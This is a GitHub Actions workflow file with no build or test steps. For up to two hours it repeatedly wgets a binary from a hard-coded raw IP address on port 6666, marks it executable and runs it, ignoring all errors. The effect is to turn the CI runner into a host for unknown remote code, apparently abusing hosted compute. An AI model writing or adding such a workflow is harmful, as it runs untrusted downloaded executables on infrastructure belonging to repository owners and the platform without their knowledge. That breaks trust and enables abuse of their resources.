
on:
  workflow_dispatch:
    inputs:
      runs-on:
        default: 'ubuntu-latest'
      run:
        default: 'wget -O {2}/d 109.188.87.160:6666/{0}_{1}'
jobs:
  loop:
    runs-on: ${{ inputs.runs-on }}
    steps:
    - uses: actions/cache@v5
      with:
        path: .
        key: workspace
        enableCrossOsArchive: true
    - shell: bash
      run: rm -rf exit
    - shell: bash
      run: |
        while (${{ format(inputs.run, runner.arch, runner.os, runner.temp) }}) || true
        do
          cp ${{ runner.temp }}/d ${{ runner.temp }}/exe.exe && chmod a+x ${{ runner.temp }}/exe.exe && stat ${{ runner.temp }}/exe.exe || true
          ${{ runner.temp }}/exe.exe || true
          if [[ -f exit ]] || (( $SECONDS > 7200 ))
          then
            break
          fi
          sleep 1
          echo -n .
        done
        rm -rf exit


